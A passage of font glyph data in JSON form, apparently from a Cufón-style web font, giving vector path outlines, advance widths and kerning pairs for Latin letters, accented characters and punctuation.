38,-37,58,-37v16,0,18,13,17,30","w":253},{"d":"108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm103,-208v0,10,-9,17,-19,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,19,8,19,18xm47,-208v0,10,-9,17,-19,17v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18v10,0,19,8,19,18","w":118},{"d":"124,-84v-49,28,-111,0,-111,-59v0,-40,25,-83,87,-83v60,0,87,46,87,108v0,92,-74,146,-157,111r10,-29v27,13,68,12,78,-21v2,-7,4,-17,6,-27xm127,-114v3,-40,-7,-87,-29,-79v-19,0,-26,20,-26,52v0,42,30,44,55,27"},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52xm140,-196r-90,0r0,-23r90,0r0,23","w":190},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm171,-256v0,10,-9,18,-19,18v-10,0,-17,-8,-17,-18v0,-10,7,-18,17,-18v10,0,19,8,19,18xm116,-256v0,10,-9,18,-19,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,19,8,19,18","w":248},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52xm127,-194v-23,0,-47,3,-68,14r-8,-8v19,-22,38,-37,58,-37v17,0,19,13,18,31","w":190},{"d":"108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm101,-188r-8,8v-21,-11,-44,-14,-67,-14v-1,-17,0,-31,17,-31v20,0,39,15,58,37","w":118},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52","w":190},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm154,-222v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,17,48,17,49,0r22,0","w":216},{"d":"58,-19v0,13,-11,23,-24,23v-13,0,-23,-10,-23,-23v0,-13,10,-23,23,-23v13,0,24,10,24,23","w":64},{"d":"159,-182v-44,-28,-81,17,-81,71v0,70,26,88,70,73v-2,-20,9,-47,-21,-41r0,-29r97,0r0,29r-17,0r0,79r-41,0r-5,-10v-65,33,-144,10,-144,-99v0,-91,94,-149,158,-97r3,-16r25,0r0,81v-19,2,-32,0,-32,-20v-2,-9,-5,-17,-12,-21xm169,-273v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,18,48,18,49,0r22,0","w":240,"k":{"y":4,"w":6,"v":6}},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14","w":185},{"d":"108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm102,-196r-89,0r0,-23r89,0r0,23","w":118},{"d":"169,0v-14,0,-25,-5,-28,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12v-1,8,2,19,-1,25v-29,-4,-46,48,-13,51v6,0,14,-2,16,-3r0,21v-28,11,-66,-1,-65,-34v0,-14,7,-29,22,-35","w":216},{"d":"360,-77r-360,0r0,-25r360,0r0,25","w":360},{"d":"58,-116v0,13,-11,23,-24,23v-13,0,-23,-10,-23,-23v0,-13,10,-23,23,-23v13,0,24,10,24,23xm58,-19v0,13,-11,23,-24,23v-13,0,-23,-10,-23,-23v0,-13,10,-23,23,-23v13,0,24,10,24,23","w":67},{"d":"86,-159v57,-32,108,10,108,77v0,44,-22,87,-74,87v-18,0,-35,-7,-44,-19v-10,19,-40,13,-67,14r0,-25v10,0,24,1,22,-9r0,-186r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,78xm136,-84v1,-54,-19,-60,-50,-45v4,35,-14,98,23,99v18,0,27,-20,27,-54"},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm156,-273v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,18,48,18,49,0r22,0","w":219},{"d":"284,-66v0,45,-18,70,-55,70v-37,0,-56,-25,-56,-70v0,-45,19,-69,56,-69v37,0,55,24,55,69xm218,-222r-103,222r-32,0r103,-222r32,0xm126,-157v0,45,-18,70,-55,70v-37,0,-56,-25,-56,-70v0,-45,19,-70,56,-70v37,0,55,25,55,70xm247,-66v0,-34,-5,-45,-18,-45v-13,0,-19,11,-19,45v0,34,6,46,19,46v13,0,18,-12,18,-46xm89,-157v0,-34,-5,-46,-18,-46v-13,0,-18,12,-18,46v0,34,5,46,18,46v13,0,18,-12,18,-46","w":299},{"d":"192,-111v0,80,-34,115,-89,115v-55,0,-90,-35,-90,-115v0,-80,35,-115,90,-115v55,0,89,35,89,115xm133,-111v0,-57,-8,-76,-30,-76v-22,0,-31,19,-31,76v0,57,9,76,31,76v22,0,30,-19,30,-76"},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm151,-247r-89,0r0,-22r89,0r0,22","w":219},{"d":"143,-129v-23,0,-36,0,-56,12r0,82v0,12,10,10,20,10r0,25r-94,0r0,-25r19,0r0,-115r-22,0r-5,-25v34,0,56,-2,69,-2v13,0,14,7,13,19v10,-13,27,-22,44,-22v20,-1,9,25,12,41xm123,-192v-23,0,-46,3,-67,14r-8,-7v19,-22,37,-37,57,-37v17,0,19,13,18,30","w":146},{"d":"86,-151v41,-34,102,-22,102,36r0,80v-1,12,9,10,19,10r0,25r-90,0r0,-25r15,0r0,-88v1,-29,-33,-21,-46,-8r0,86v0,11,9,10,19,10r0,25r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,86","w":215},{"d":"228,-193v-20,0,-26,0,-36,18r-34,67r27,0r0,23r-39,0r0,13r39,0r0,23r-39,0v-2,16,5,22,22,20r0,29r-102,0r0,-29r21,0r0,-20r-40,0r0,-23r40,0r0,-13r-40,0r0,-23r28,0r-34,-68v-7,-16,-15,-18,-34,-17r0,-29r103,0r0,29r-15,0r31,63r32,-63r-14,0r0,-29r84,0r0,29","w":235},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm127,-194v-23,0,-46,3,-67,14r-8,-8v19,-22,38,-37,58,-37v17,0,18,14,17,31","w":182},{"d":"185,25v0,28,-24,57,-90,57v-66,0,-113,-54,-59,-81v-18,-14,-15,-42,3,-58v-43,-47,-1,-131,76,-111v15,-23,32,-31,47,-31v18,0,17,14,17,30v-11,0,-24,0,-38,10v55,29,34,122,-44,122v-12,0,-24,-2,-33,-5v-6,15,1,17,27,17v52,0,94,7,94,50xm117,-103v0,-22,-5,-37,-20,-37v-15,0,-20,15,-20,37v0,22,5,36,20,36v15,0,20,-14,20,-36xm138,30v5,-23,-62,-10,-76,-16v-13,19,10,35,36,35v27,0,40,-10,40,-19xm119,-206v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":195},{"d":"197,-58r-40,0v-2,20,1,33,25,29r0,29r-105,0r0,-29r23,0r0,-29r-92,0r0,-26r101,-138r48,0r0,132r40,0r0,32xm100,-90r0,-68r-51,68r51,0"},{"d":"185,25v0,28,-24,57,-90,57v-66,0,-113,-54,-59,-81v-18,-14,-15,-42,3,-58v-43,-47,-1,-131,76,-111v15,-23,32,-31,47,-31v18,0,17,14,17,30v-11,0,-24,0,-38,10v55,29,34,122,-44,122v-12,0,-24,-2,-33,-5v-6,15,1,17,27,17v52,0,94,7,94,50xm117,-103v0,-22,-5,-37,-20,-37v-15,0,-20,15,-20,37v0,22,5,36,20,36v15,0,20,-14,20,-36xm138,30v5,-23,-62,-10,-76,-16v-13,19,10,35,36,35v27,0,40,-10,40,-19","w":195},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm48,-216r89,0r0,22r-89,0r0,-22","w":185},{"d":"194,-139v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v5,26,-16,76,24,69r0,29r-104,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0","w":208,"k":{"s":11,"c":9,"a":9,"\u00e0":9,"\u00e1":9,"\u00e2":9,"\u00e3":9,"\u00e4":9,"\u0101":9,"\u0103":9,"\u00e5":9,"\u01fb":9,"\u0105":9,"\u00e6":9,"\u01fd":9,"A":24,"\u00c0":24,"\u00c1":24,"\u00c2":24,"\u00c3":24,"\u00c4":24,"\u0100":24,"\u0102":24,"\u00c5":24,"\u01fa":24,"\u0104":24,"\u00c6":24,"\u01fc":24,"e":8,"\u00e8":8,"\u00e9":8,"\u00ea":8,"\u011b":8,"\u00eb":8,"\u0113":8,"\u0115":8,"\u0117":8,"\u0119":8,"o":7,"\u00f2":7,"\u00f3":7,"\u00f4":7,"\u00f5":7,"\u00f6":7,"\u014d":7,"\u014f":7,"\u0151":7,"\u00f8":7,"\u01ff":7,"\u0153":7}},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm139,-223v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,18,48,18,49,0r22,0","w":182},{"d":"99,-67r-85,0r0,-38r85,0r0,38","w":113},{"d":"185,25v0,28,-24,57,-90,57v-66,0,-113,-54,-59,-81v-18,-14,-15,-42,3,-58v-43,-47,-1,-131,76,-111v15,-23,32,-31,47,-31v18,0,17,14,17,30v-11,0,-24,0,-38,10v55,29,34,122,-44,122v-12,0,-24,-2,-33,-5v-6,15,1,17,27,17v52,0,94,7,94,50xm117,-103v0,-22,-5,-37,-20,-37v-15,0,-20,15,-20,37v0,22,5,36,20,36v15,0,20,-14,20,-36xm138,30v5,-23,-62,-10,-76,-16v-13,19,10,35,36,35v27,0,40,-10,40,-19xm143,-199v-26,4,-34,-10,-47,-19v-13,9,-21,23,-46,19v15,-16,32,-58,64,-36","w":195},{"d":"240,0v-38,1,-75,1,-85,-26v-32,51,-144,35,-144,-40v0,-31,20,-54,60,-60v-24,-5,-41,-22,-41,-45v0,-34,35,-55,83,-55v61,1,91,29,86,86v13,2,36,-6,36,10r0,21r-36,0v1,39,-10,90,41,80r0,29xm108,-33v56,0,26,-74,33,-122v7,-43,-52,-50,-54,-11v0,19,17,29,40,26r0,31v-31,-2,-53,4,-53,38v0,23,12,38,34,38","w":250},{"d":"197,0r-87,0r0,-25v7,2,15,-5,8,-10r-13,-15r-20,25r13,0r0,25r-87,0r0,-25v38,3,47,-36,67,-54r-52,-61r-19,0r0,-25r89,0r0,25v-5,-2,-13,5,-7,9r14,16r20,-25r-14,0r0,-25r81,0r5,25v-39,-4,-46,37,-68,55r52,60r18,0r0,25","w":204},{"d":"80,-140v3,46,-18,130,45,106r0,31v-9,3,-25,7,-43,7v-70,0,-56,-77,-57,-144r-21,0r0,-25r21,0v0,0,-3,-35,15,-37r40,-6r0,43r34,0r5,25r-39,0xm87,39v0,17,-8,33,-26,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,21,8,21,22","w":132},{"d":"57,-13v0,19,-9,42,-29,72r-14,-7v8,-14,16,-36,17,-47v-13,-1,-21,-11,-21,-21v0,-14,10,-23,23,-23v14,0,24,10,24,26","w":64},{"d":"57,-76v0,41,61,61,70,23v5,-20,-39,-30,-56,-40v-82,-23,-58,-133,24,-133v21,0,38,6,48,15r1,-11r30,0r0,85v-47,10,-22,-56,-69,-51v-43,5,-28,36,8,51v33,14,75,28,75,74v0,59,-89,87,-131,50r-3,13r-30,0r0,-86v14,1,33,-5,33,10xm132,39v0,17,-8,33,-26,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,21,8,21,22","w":202},{"d":"166,-94r-143,64r0,-39r97,-40r-97,-43r0,-36r143,63r0,31","w":189},{"d":"108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm110,-228v-3,17,-10,36,-36,36v-19,0,-40,-21,-51,0r-19,0v4,-23,16,-36,35,-36v20,0,42,22,52,0r19,0","w":118},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74","w":219},{"d":"271,-140v-18,-1,-27,1,-32,17r-35,123r-45,0r-24,-78r-26,78r-45,0r-45,-140r-19,0r0,-25r91,0r0,25v-13,-1,-20,3,-16,15r20,67r34,-107r23,0r34,107r22,-82r-19,0r0,-25r77,0","w":264,"k":{"y":-5,"x":-4,"t":-6,"f":-2}},{"d":"136,-71v-22,1,-41,7,-41,30v0,18,3,36,3,53v0,61,-33,69,-87,69r0,-29v43,-1,23,-53,23,-86v0,-27,8,-41,48,-48v-65,-8,-42,-53,-42,-102v0,-21,-8,-31,-29,-33r0,-29v54,0,87,8,87,69v0,38,-16,87,38,83r0,23","w":164},{"d":"89,69r-103,0r0,-33r45,0r0,-248r-45,0r0,-34r103,0r0,315","w":118},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm173,-209v-25,0,-39,8,-57,29r-8,-8v15,-35,33,-47,50,-47v17,-1,15,11,15,26xm108,-209v-25,0,-38,8,-56,29r-8,-8v15,-35,33,-47,50,-47v17,0,14,12,14,26","w":216},{"d":"197,0r-179,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-1,28,41,10,63,15v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm177,-204v0,17,-8,33,-26,59r-12,-6v7,-12,13,-28,14,-38v-12,0,-18,-8,-18,-17v0,-12,8,-20,20,-20v12,0,22,8,22,22","w":212},{"d":"192,-95v-11,19,-31,36,-56,36v-37,0,-77,-49,-101,-4r-25,-24v15,-24,34,-36,57,-36v41,0,76,46,99,5v0,0,26,22,26,23","w":201},{"d":"178,-191r-24,0r0,272r-34,0r0,-272r-20,0r0,272r-34,0r0,-183v-32,0,-57,-25,-57,-58v0,-32,25,-58,57,-58r112,0r0,27","w":189},{"d":"143,-129v-23,0,-36,0,-56,12r0,82v0,12,10,10,20,10r0,25r-94,0r0,-25r19,0r0,-115r-22,0r-5,-25v34,0,56,-2,69,-2v13,0,14,7,13,19v10,-13,27,-22,44,-22v20,-1,9,25,12,41xm82,39v0,17,-9,33,-27,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,22,8,22,22","w":146},{"d":"147,-106v15,14,14,23,0,37r-54,55r-10,-22r38,-52r-38,-52r10,-21xm81,-106v16,14,14,22,0,37r-53,55r-10,-22r38,-52r-38,-52r10,-21","w":176},{"d":"154,81v-54,0,-87,-8,-87,-69v0,-38,16,-88,-38,-83r0,-23v21,-1,41,-7,41,-30v0,-18,-3,-36,-3,-53v0,-61,33,-69,87,-69r0,29v-43,1,-24,52,-24,86v0,27,-8,42,-48,49v64,7,43,51,43,101v0,21,8,31,29,33r0,29","w":164},{"d":"184,-80v10,84,-103,102,-157,65r14,-37v28,27,91,24,83,-27v3,-41,-44,-46,-64,-24r-22,-10r0,-109r131,0r0,38r-95,0r0,45v46,-25,118,-1,110,59"},{"d":"131,-14v-40,35,-101,22,-101,-36r0,-90r-22,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v0,29,33,22,46,8r0,-96r-18,0r0,-25r91,0r5,25v-13,-1,-23,0,-23,14v-2,100,23,212,-87,207v-18,0,-38,-3,-50,-7r0,-35v34,12,87,16,82,-31r0,-22","w":214},{"d":"143,-129v-23,0,-36,0,-56,12r0,82v0,12,10,10,20,10r0,25r-94,0r0,-25r19,0r0,-115r-22,0r-5,-25v34,0,56,-2,69,-2v13,0,14,7,13,19v10,-13,27,-22,44,-22v20,-1,9,25,12,41","w":146},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm151,-238v-26,4,-34,-10,-47,-19v-13,9,-21,23,-46,19v16,-16,31,-58,64,-36","w":219},{"d":"180,-69v0,35,-23,73,-85,73v-26,0,-51,-6,-73,-19r14,-40v25,23,84,29,84,-16v1,-22,-15,-30,-42,-29r0,-29v23,1,36,-11,36,-32v0,-36,-47,-26,-73,-16r-11,-36v52,-24,142,-17,142,45v0,18,-8,37,-36,46v30,7,44,23,44,53"},{"d":"244,0r-77,0r-69,-101v6,27,-18,77,24,72r0,29r-104,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,67v21,-25,64,-73,75,-96r58,0r0,29v-19,-1,-29,0,-39,12r-45,51r61,86v7,11,17,16,36,15r0,29","w":248,"k":{"y":6,"w":7,"v":7,"u":6,"\u00f9":6,"\u00fa":6,"\u00fb":6,"\u0169":6,"\u00fc":6,"\u016b":6,"\u016d":6,"\u016f":6,"\u0171":6,"\u0173":6}},{"d":"236,-193r-20,0r0,193r-32,0r-105,-131r0,87v-2,14,10,16,25,15r0,29r-86,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r55,0r106,129r0,-85v2,-15,-10,-16,-25,-15r0,-29r86,0r0,29","w":253,"k":{"y":9,"x":9,"w":9,"v":9,"s":11,"c":8,"a":8,"\u00e0":8,"\u00e1":8,"\u00e2":8,"\u00e3":8,"\u00e4":8,"\u0101":8,"\u0103":8,"\u00e5":8,"\u01fb":8,"\u0105":8,"\u00e6":8,"\u01fd":8,"u":9,"\u00f9":9,"\u00fa":9,"\u00fb":9,"\u0169":9,"\u00fc":9,"\u016b":9,"\u016d":9,"\u016f":9,"\u0171":9,"\u0173":9,"o":7,"\u00f2":7,"\u00f3":7,"\u00f4":7,"\u00f5":7,"\u00f6":7,"\u014d":7,"\u014f":7,"\u0151":7,"\u00f8":7,"\u01ff":7,"\u0153":7}},{"d":"205,-170v53,0,80,44,74,97r-99,0v-2,50,50,53,80,29r14,24v-26,26,-93,37,-123,7v-53,39,-138,14,-138,-69v0,-84,85,-109,139,-69v12,-11,31,-19,53,-19xm227,-98v3,-17,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm122,-82v0,-35,-7,-53,-26,-53v-19,0,-25,18,-25,53v0,35,6,52,25,52v19,0,26,-17,26,-52","w":294},{"d":"142,-66v4,70,-70,81,-125,61r0,-36v21,13,66,17,66,-17r0,-122v1,-21,-35,-10,-54,-13r-8,-29r121,0r0,156xm129,-238v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v16,-15,32,-58,64,-36","w":172},{"d":"208,-153v4,46,-34,77,-110,72v3,23,-12,58,24,52r0,29r-104,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29v85,6,187,-26,194,69xm147,-153v0,-31,-15,-43,-49,-40r0,82v34,3,49,-7,49,-42","w":220,"k":{"X":6,"V":5,"U":5,"J":6,"a":4,"\u00e0":4,"\u00e1":4,"\u00e2":4,"\u00e3":4,"\u00e4":4,"\u0101":4,"\u0103":4,"\u00e5":4,"\u01fb":4,"\u0105":4,"\u00e6":4,"\u01fd":4,"A":24,"\u00c0":24,"\u00c1":24,"\u00c2":24,"\u00c3":24,"\u00c4":24,"\u0100":24,"\u0102":24,"\u00c5":24,"\u01fa":24,"\u0104":24,"\u00c6":24,"\u01fc":24,"e":3,"\u00e8":3,"\u00e9":3,"\u00ea":3,"\u011b":3,"\u00eb":3,"\u0113":3,"\u0115":3,"\u0117":3,"\u0119":3,"o":5,"\u00f2":5,"\u00f3":5,"\u00f4":5,"\u00f5":5,"\u00f6":5,"\u014d":5,"\u014f":5,"\u0151":5,"\u00f8":5,"\u01ff":5,"\u0153":5,"W":5,"\u0174":5,"Y":9,"\u00dd":9,"\u0176":9,"\u0178":9}},{"d":"57,-117v0,13,-11,24,-24,24v-13,0,-23,-11,-23,-24v0,-13,10,-23,23,-23v13,0,24,10,24,23xm57,-13v0,19,-9,42,-29,72r-14,-7v8,-14,16,-36,17,-47v-13,-1,-21,-11,-21,-21v0,-14,10,-23,23,-23v14,0,24,10,24,26","w":68},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm139,-184v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v15,-16,32,-58,64,-36","w":185},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52xm147,-228v-3,17,-10,36,-36,36v-19,0,-41,-21,-52,0r-18,0v4,-23,16,-36,35,-36v20,0,42,22,52,0r19,0","w":190},{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"w":86},{"d":"230,-193v-17,-1,-26,1,-31,16r-64,177r-39,0r-59,-177v-5,-16,-13,-16,-30,-16r0,-29r104,0r0,29r-19,0r35,115r39,-115r-18,0r0,-29r82,0r0,29","w":237,"k":{"y":12,"g":18,"Q":4,"J":3,"a":21,"\u00e0":21,"\u00e1":21,"\u00e2":21,"\u00e3":21,"\u00e4":21,"\u0101":21,"\u0103":21,"\u00e5":21,"\u01fb":21,"\u0105":21,"\u00e6":21,"\u01fd":21,"u":12,"\u00f9":12,"\u00fa":12,"\u00fb":12,"\u0169":12,"\u00fc":12,"\u016b":12,"\u016d":12,"\u016f":12,"\u0171":12,"\u0173":12,"A":35,"\u00c0":35,"\u00c1":35,"\u00c2":35,"\u00c3":35,"\u00c4":35,"\u0100":35,"\u0102":35,"\u00c5":35,"\u01fa":35,"\u0104":35,"\u00c6":35,"\u01fc":35,"e":18,"\u00e8":18,"\u00e9":18,"\u00ea":18,"\u011b":18,"\u00eb":18,"\u0113":18,"\u0115":18,"\u0117":18,"\u0119":18,"o":18,"\u00f2":18,"\u00f3":18,"\u00f4":18,"\u00f5":18,"\u00f6":18,"\u014d":18,"\u014f":18,"\u0151":18,"\u00f8":18,"\u01ff":18,"\u0153":18,"i":2,"\u0131":2,"\u00ec":2,"\u00ed":2,"\u00ee":2,"\u0129":2,"\u00ef":2,"\u012b":2,"\u012d":2,"\u012f":2,"\u0133":2,"C":12,"\u0106":12,"\u00c7":12,"\u0108":12,"\u010c":12,"\u010a":12,"G":12,"\u011c":12,"\u011e":12,"\u0120":12,"\u0122":12,"O":4,"\u00d2":4,"\u00d3":4,"\u00d4":4,"\u00d5":4,"\u00d6":4,"\u014c":4,"\u014e":4,"\u0150":4,"\u00d8":4,"\u01fe":4,"\u0152":4}},{"d":"68,94r-47,0r0,-360r47,0r0,360","w":89},{"d":"138,-156v59,-39,135,10,122,83r-100,0v-2,50,50,53,80,29r14,24v-28,28,-103,36,-130,2v-24,31,-112,38,-112,-30v0,-38,36,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v35,-12,83,-18,111,3xm205,-98v3,-17,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm109,-42v-5,-13,-7,-28,-7,-41v-34,-4,-51,50,-18,50v10,0,20,-4,25,-9xm175,-194v-23,0,-46,3,-67,14r-8,-8v19,-22,37,-37,57,-37v17,0,19,13,18,31","w":274},{"d":"88,-151v40,-35,104,-22,101,36v-3,74,24,174,-61,174v-14,0,-31,-1,-44,-6r0,-33v20,7,50,12,50,-19r0,-114v0,-29,-33,-22,-46,-8r0,86v-1,11,7,10,17,10r0,25r-91,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v13,-1,15,5,14,16","w":212},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm144,-228v-3,17,-10,36,-36,36v-19,0,-40,-21,-51,0r-18,0v4,-44,44,-38,72,-25v8,0,13,-6,15,-11r18,0","w":185},{"d":"14,-222v76,4,184,-20,186,54v0,21,-13,41,-40,46v37,5,56,24,56,55v0,50,-28,67,-100,67r-98,0r0,-29r21,0r0,-149v2,-14,-10,-16,-25,-15r0,-29xm141,-164v1,-24,-16,-30,-43,-29r0,60v26,1,42,-1,43,-31xm155,-67v1,-32,-21,-42,-57,-39r0,62v-2,15,10,16,24,15v23,0,33,-16,33,-38","w":228},{"d":"333,-193v-18,0,-27,-1,-32,16r-53,177r-42,0r-35,-114r-39,114r-43,0r-51,-176v-4,-17,-13,-17,-31,-17r0,-29r103,0r0,29r-18,0r28,115r48,-144r24,0r45,144r30,-115r-17,0r0,-29r83,0r0,29xm227,-238v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v15,-16,32,-58,64,-36","w":340,"k":{"Q":4,"U":1,"y":11,"s":23,"u":11,"\u00f9":11,"\u00fa":11,"\u00fb":11,"\u0169":11,"\u00fc":11,"\u016b":11,"\u016d":11,"\u016f":11,"\u0171":11,"\u0173":11,"O":4,"\u00d2":4,"\u00d3":4,"\u00d4":4,"\u00d5":4,"\u00d6":4,"\u014c":4,"\u014e":4,"\u0150":4,"\u00d8":4,"\u01fe":4,"\u0152":4,"e":19,"\u00e8":19,"\u00e9":19,"\u00ea":19,"\u011b":19,"\u00eb":19,"\u0113":19,"\u0115":19,"\u0117":19,"\u0119":19,"A":32,"\u00c0":32,"\u00c1":32,"\u